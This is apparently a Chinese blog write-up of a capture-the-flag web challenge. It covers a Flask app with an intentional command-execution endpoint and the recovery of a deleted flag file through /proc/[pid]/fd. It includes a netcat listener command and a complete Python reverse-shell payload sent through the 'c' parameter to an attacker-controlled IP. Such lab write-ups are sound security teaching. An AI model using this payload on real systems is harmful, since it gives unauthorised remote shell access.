[V&N2020 公开赛]CHECKIN -wp

最新推荐文章于 2021-11-05 12:49:05 发布
最新推荐文章于 2021-11-05 12:49:05 发布
阅读量249 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107820013
版权 
from flask import Flask, request
import os
app = Flask(__name__)

flag_file = open("flag.txt", "r")
# flag = flag_file.read()
# flag_file.close()
#
# @app.route('/flag')
# def flag():
#     return flag
## want flag? naive!

# You will never find the thing you want:) I think
@app.route('/shell')
def shell():
    os.system("rm -f flag.txt")
    exec_cmd = request.args.get('c')
    os.system(exec_cmd)
    return "1"

@app.route('/')
def source():
    return open("app.py","r").read()

if __name__ == "__main__":
    app.run(host='0.0.0.0')
 

flag_file = open("flag.txt", "r")

在这里我们可以看到flag.txt已经被打开

os.system("rm -f flag.txt")
    exec_cmd = request.args.get('c')
    os.system(exec_cmd)
    return "1"

在shell目录里可以知道,会把flag.txt删除。
然后接收参数c,并可以进行命令执行。
最后一行可以看出其实无论如何都只返回1,那么就无法直接读东西。

文件描述符,在linux里,当一个进程打开某个文件直到关闭前,该进程会获得文件描述符,而文件描述符里有文件的内容,即便已经将文件删除,只是删除了其相应的目录索引节点,若进程依然存在没被关闭的话,就依然可以通过文件提供给它的文件描述符进行操作。/proc/[pid]/fd 这个目录里包含了进程打开文件的情况,pid就是进程记录的打开文件的序号。

由以上可以得知,由于先打开了flag.txt但没有关掉就直接删除,依旧可以查询内容。

这个时候我们可以通过命令执行反弹shell。
先开个buu小号,在另一个浏览器里创建一个buu内网靶场(buu内网是不通外网的,所以自己的vps等无用,必须在buu内网创建),然后用xshell等连接。
在这里插入图片描述看一下靶机的ip,监听一个任意端口

nc -lvp 3000

然后利用以下payload反弹shell(自己添加一下靶机的ip,监听的端口等)

payload:shell?c=python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('IP',端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

接收到shell后

cat /porc/*/fd/*

查询一下所有进程内容
在这里插入图片描述

冰可乐不加可乐
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[V&N2020 公开赛]CHECKIN
SopRomeo的博客
04-21 935
将python整理一下 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") #flag = flag_file.read() #flag_file.close() #@app.route('/flag') #def flag(): # retur...
[V&N2020 公开赛]CHECKIN(文件被进程打开后被删除,内存中有文件内容)
qq_44657899的博客
09-11 675
这道题我在vps上实验了一下,对于linux的理解又加深了。 知识点:文件描述符, 在linux里,当一个进程打开某个文件直到关闭前,该进程会获得文件描述符,而文件描述符里有文件的内容,即便已经将文件删除,只是删除了其相应的目录索引节点,若进程依然存在没被关闭的话,就依然可以通过文件提供给它的文件描述符进行操作。/proc/[pid]/fd这个目录里包含了进程打开文件的情况,pid就是进程记录的打开文件的序号。 实验:读取内存中的flag内容 使用命令:lsof lsof命令可以查看进程打开那些文件
几种反弹shell命令
qq_44657899的博客
07-19 690
https://www.cnblogs.com/20175211lyz/p/12397933.html
V&N2020 公开赛 CHECKIN
cjdgg的博客
11-05 1302
V&N2020 公开赛 CHECKIN 这题直接给出了源代码,不是很多,也很简单 直接访问/flag是拿不到flag的 而访问/shell虽然可以执行一条传入的命令,但是它会把存放flag的txt文件给删掉 而且由于/shell路由返回的是1,所以我们是看不到命令执行后的回显的,那就只能弹shell了 因为这里是python环境下,所以去找了python环境下反弹shell相关文章 emem我就拿了这个改成了自己的vps地址,这里得注意一点,估计是靶机环境的缘故,得是python3才能执行 p
2020 年 V&N 内部考核赛 WriteUp
12-22
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # ...
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
southwest-checkin-3
03-14
西南签到3.X 自动检查乘客的西南航班。 第3版是v2的升级版本,以通过Heroku托管的最新...由非Rails人员针对Ruby 2.6.3,Rails 5.2.3更新获取签到源git clone https://github.com/davidkassa/southwest-checkin-3.gitcd
checkin-detector:酒店入住 人脸检测
05-16
checkin-detetor 人脸检测 / 人脸识别 / 人脸搜索 / 身份证识别 / 人脸比对 可实现实时拍照与身份证照片进行对比. Get Start $ git clone git@github.com:CNBlackJ/checkin-detector.git && cd checkin-detector $ ...
[SUCTF 2019]CheckIn -wp
freerats的博客
06-22 254
打开容器是一个很简陋的文件上传页面,习惯性的先传一个以jpg为后缀的一句话 发现无法上传<?,直接写的一句话肯定不行,这里可以使用\来代替<?php ?> 修改后再次提交,发现还是限制image,这个时候就需要添加图片头了,先试一下添加GIF89a,发现可以上传 发现不仅有我们上传的图片马,还有一个index.php 一开始产生的是上传.htaccess,把jpg解析为php,但这里没有成功。.htaccess的使用还是有限制的,首先服务器要是Apache,还要进行其他的配置 .htac
GACTF复现 Checkin wp
苗_的博客
09-03 230
拿到附件,发现输入flag的时候,不输入,直接回车,会有下面的报错: 所以直接来到报错中出现的目录下,找到ruby脚本。 注意程序运行完之后会删除上面解压出来的那个目录,所以运行程序后,停在输入flag的那一步,接着去找上面的目录中的ruby脚本。 AES的ecb模式,有密文和密钥,然后直接在线解密: 这个报错有一部分是碰巧碰出来的,正常我们可以用process monitor来监测进程,找到ruby文件,具体见该师傅题解。 ...
re学习笔记(48)BUUCTF-re-[V&N2020 公开赛]CSRe
逆向随笔
03-01 1690
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 C#程序,且用Eazfuscator.NET混淆了代码。 使用de4dot工具进行处理 之后使用dnSpy32位打开 找到main()函数 Class3.smethod_0查看发现是对字符串进行sha1加密。 加密后与字符串进行比对。 将加密后的在【cmd5】网站进行查询 得到flag为flag{1415turn} ...
BUUCTF:[V&N2020 公开赛]拉胯的三条命令
末初的CSDN博客
11-03 994
题目地址:https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]%E6%8B%89%E8%83%AF%E7%9A%84%E4%B8%89%E6%9D%A1%E5%91%BD%E4%BB%A4 题目文件zip zip文件,添加后缀zip 说明.txt 在参加网络安全大赛第二届世界巡回赛新加坡站一场与SP战队的比赛时,作为K&K战队主防手的你使用经典的“三条命令”检查端口封闭状况。可是这次比赛平台没有回显,.
[V&N2020 公开赛]easyTHeap
、moddemod
07-06 460
ubuntu18.04 libc-2.27有Tcache机制,这道题malloc的指针数组在free的时没有置空… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(size): p.sendlineafter('choice:', str(1)) p.sendlineafter('size?', st.
[V&N2020 公开赛 web]
weixin_43610673的博客
04-05 1067
HappyCTFd CVE-2020-7245 https://nvd.nist.gov/vuln/detail/CVE-2020-7245 https://www.colabug.com/2020/0204/6940556/ 开始以为是注入,尝试了好一会无从下手,然后看wp知道是cve。。。https://www.zhaoj.in/read-6407.html 注册一个 admin用户...
BUUCTF Crypto [V&N2020 公开赛]easy_RSA wp
hsqGOD's blog
04-21 1690
这道题我们看到加密的脚本,首先我们可以关注到,这题目的素数生成机制是不断的乘然后再减一可以得到素数,我们可以发现,因子p再加一也就是p+1是光滑到,于是我们可以使用Williams’p+1 algorithm求解 可以直接调用库的函数 // 命令行调用即可 python2 -m primefac -vs -m=p+1 794137173995657728016066441938374096751...
re学习笔记(47)BUUCTF-re-[V&N2020 公开赛]strangeCpp
逆向随笔
03-01 1624
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 main()函数没啥东西…… 找好久… putchar字节这里,中间夹杂着数据…… 然后交叉引用,来到这里 其中sub_140011384()函数,将dword_140021190操作得到result 然后result要等于607052314,dword_140021190要小于等于14549743 缩小爆破范围…… 写脚本 ...
编写js编写 做一个建议的停车场使用数据记录仪 此程序能够监听命令行的输入,命令行可以输入三类命令:(下列命令中的数值均为举例,实际使用中不会限定数值) 1:checkin -t=225959 -n=AT4257 2:checkout -t=233
最新发布
04-04
959 -n=AT4257 3:report 其中,checkin命令表示车辆进入停车场,需要记录时间和车牌号;checkout命令表示车辆离开停车场,需要记录时间和车牌号,并计算停车时间和费用;report命令表示生成停车场使用报告,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值